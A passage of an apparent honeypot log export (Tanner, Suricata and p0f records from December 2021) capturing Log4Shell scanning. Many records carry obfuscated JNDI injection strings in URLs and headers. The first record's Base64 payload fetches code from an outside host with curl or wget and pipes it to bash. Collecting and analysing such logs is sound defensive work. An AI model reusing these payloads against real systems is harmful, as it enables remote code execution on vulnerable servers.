""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}"", ""headers"": {""host"": ""172.16.0.42:80"", ""user-agent"": ""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}"", ""referer"": ""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}"", ""accept-encoding"": ""gzip"", ""connection"": ""close""}, ""uuid"": ""b6fbd89d-6379-443e-93b9-c96a030ea099"", ""peer"": {""ip"": ""195.54.160.149"", ""port"": 34106}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""9738f194-6c48-4664-a8b5-8689791a8a71""}}}, ""timestamp"": ""2021-12-14T21:29:51.436584""}",,,,,,GET,,,,,,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}",,,,,,,,,,,index,1,1,"0.6.0","9738f194-6c48-4664-a8b5-8689791a8a71","0.6.0",,,,,,,,,,,,,,,,,,"195.54.160.149",34106,,,,,,,,,200,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:29:51.436584",,,,,,,,,Tanner,,,"b6fbd89d-6379-443e-93b9-c96a030ea099",
"2021-12-14T21:27:20.209Z",1,"s2_Xun0B6VkG8jKzv7k8","logstash-suricata-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1993818513118624,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"137.184.96.227","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,119980f12f89,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/favicon.ico",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",47948754,,"{""timestamp"":""2021-12-14T21:27:20.209506+0000"",""flow_id"":1993818513118624,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""137.184.96.227"",""src_port"":41514,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/favicon.ico"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"137.184.96.227",41514,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T21:27:20.209506+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:27:20.022Z",1,"CgzXun0B5e7x5EYnv_BB","logstash-suricata-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,426812580032014,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"137.184.96.227","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,119980f12f89,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",47948254,,"{""timestamp"":""2021-12-14T21:27:20.022941+0000"",""flow_id"":426812580032014,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""137.184.96.227"",""src_port"":41498,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"137.184.96.227",41498,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T21:27:20.022941+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:27:20.000Z",1,"1W_Xun0B6VkG8jKzw7nI","logstash-p0f-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"137.184.96.227","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,119980f12f89,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",55710116,,"{""timestamp"": ""2021/12/14 21:27:20"", ""mod"": ""http request"", ""client_ip"": ""137.184.96.227"", ""server_ip"": ""172.16.0.42"", ""client_port"": 41514, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"137.184.96.227",41514,,,,,,,,,,,cli,rawcoast,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T21:27:19.000Z",1,GQzXun0B5e7x5EYnwvDu,"logstash-p0f-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"137.184.96.227","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,119980f12f89,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",55706586,,"{""timestamp"": ""2021/12/14 21:27:19"", ""mod"": ""http request"", ""client_ip"": ""137.184.96.227"", ""server_ip"": ""172.16.0.42"", ""client_port"": 41498, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"137.184.96.227",41498,,,,,,,,,,,cli,rawcoast,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T19:42:52.176Z",1,"pAp4un0B5e7x5EYnLmq_","logstash-suricata-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1989235372137070,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"165.227.24.81","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,119980f12f89,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/favicon.ico",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",44904484,,"{""timestamp"":""2021-12-14T19:42:52.176141+0000"",""flow_id"":1989235372137070,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""165.227.24.81"",""src_port"":48160,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/favicon.ico"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"165.227.24.81",48160,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T19:42:52.176141+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T19:42:51.721Z",1,"owp4un0B5e7x5EYnLmq_","logstash-suricata-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2068662202341236,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"165.227.24.81","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,119980f12f89,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",44903984,,"{""timestamp"":""2021-12-14T19:42:51.721735+0000"",""flow_id"":2068662202341236,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""165.227.24.81"",""src_port"":48148,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"165.227.24.81",48148,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T19:42:51.721735+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T19:42:51.000Z",1,PG14un0B6VkG8jKzLjLK,"logstash-p0f-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"165.227.24.81","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,119980f12f89,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",51664091,,"{""timestamp"": ""2021/12/14 19:42:51"", ""mod"": ""http request"", ""client_ip"": ""165.227.24.81"", ""server_ip"": ""172.16.0.42"", ""client_port"": 48160, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"165.227.24.81",48160,,,,,,,,,,,cli,rawcoast,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T19:42:51.000Z",1,M214un0B6VkG8jKzLjLK,"logstash-p0f-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"165.227.24.81","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,119980f12f89,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",51661539,,"{""timestamp"": ""2021/12/14 19:42:51"", ""mod"": ""http request"", ""client_ip"": ""165.227.24.81"", ""server_ip"": ""172.16.0.42"", ""client_port"": 48148, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"165.227.24.81",48148,,,,,,,,,,,cli,rawcoast,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T18:54:12.564Z",1,AwlLun0B5e7x5EYnqiUm,"logstash-suricata-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1326633396167156,,,Toronto,NA,CA,CA,Canada,,"165.22.231.66","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,119980f12f89,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/favicon.ico",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",44486634,,"{""timestamp"":""2021-12-14T18:54:12.564282+0000"",""flow_id"":1326633396167156,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""165.22.231.66"",""src_port"":50838,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/favicon.ico"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"165.22.231.66",50838,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T18:54:12.564282+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T18:54:12.000Z",1,651Lun0BCXMCNTQLoJkX,"logstash-p0f-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Toronto,NA,CA,CA,Canada,,"165.22.231.66","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,119980f12f89,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",50862313,,"{""timestamp"": ""2021/12/14 18:54:12"", ""mod"": ""http request"", ""client_ip"": ""165.22.231.66"", ""server_ip"": ""172.16.0.42"", ""client_port"": 50838, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"165.22.231.66",50838,,,,,,,,,,,cli,rawcoast,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T18:54:11.939Z",1,"-mtLun0B6VkG8jKzquom","logstash-suricata-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,192491446989135,,,Toronto,NA,CA,CA,Canada,,"165.22.231.66","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,119980f12f89,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",44486080,,"{""timestamp"":""2021-12-14T18:54:11.939804+0000"",""flow_id"":192491446989135,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""165.22.231.66"",""src_port"":50656,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""metadata"":{""flowints"":{""tcp.retransmission.count"":2}},""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,2,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"165.22.231.66",50656,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T18:54:11.939804+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T18:54:10.000Z",1,451Lun0BCXMCNTQLoJkX,"logstash-p0f-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,"???",,,,,,,"172.16.0.42",8000,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Toronto,NA,CA,CA,Canada,,"165.22.231.66","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,119980f12f89,,,,,,,,,,,,,,,,,,,,,,,,log,,,,none,,,,"/data/p0f/log/p0f.json",50860014,,"{""timestamp"": ""2021/12/14 18:54:10"", ""mod"": ""http request"", ""client_ip"": ""165.22.231.66"", ""server_ip"": ""172.16.0.42"", ""client_port"": 50656, ""server_port"": 8000, ""subject"": ""cli"", ""app"": ""???"", ""lang"": ""none"", ""params"": ""none"", ""raw_sig"": ""1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}""}",,,,,,,"http request",,,none,,,,,,,,,,,"1:Host,User-Agent,Accept-Encoding=[gzip, deflate],Accept=[*/*],Connection=[keep-alive]:Accept-Language,Accept-Charset,Keep-Alive:${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",,,,,,,,,,,,,,,,,,,,,,,,,"165.22.231.66",50656,,,,,,,,,,,cli,rawcoast,"172.16.0.42","172.16.0.42","[""p0f"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,,,,,,,,,,P0f,,,,
"2021-12-14T18:45:46.459Z",1,uwhDun0B5e7x5EYn1vGV,"logstash-suricata-2021.12.14",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1070215225588415,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"165.227.24.81","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,23609855f490,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/favicon.ico",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",24747482,,"{""timestamp"":""2021-12-14T18:45:46.459835+0000"",""flow_id"":1070215225588415,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""165.227.24.81"",""src_port"":35868,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/favicon.ico"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"165.227.24.81",35868,,,,,,,,,,,,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T18:45:46.459835+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T18:45:46.306Z",1,uQhDun0B5e7x5EYn1vGV,"logstash-suricata-2021.12.14",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8000,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1424906509772242,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"165.227.24.81","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,23609855f490,"gzip, deflate",,,,"172.16.0.42",,GET,8000,,,,,,"${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}",0,"HTTP/1.1",200,"/",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",24746512,,"{""timestamp"":""2021-12-14T18:45:46.306647+0000"",""flow_id"":1424906509772242,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""165.227.24.81"",""src_port"":35854,""dest_ip"":""172.16.0.42"",""dest_port"":8000,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8000,""url"":""/"",""http_user_agent"":""${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback}"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"165.227.24.81",35854,,,,,,,,,,,,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T18:45:46.306647+0000",,,,,,,,0,Suricata,,,,
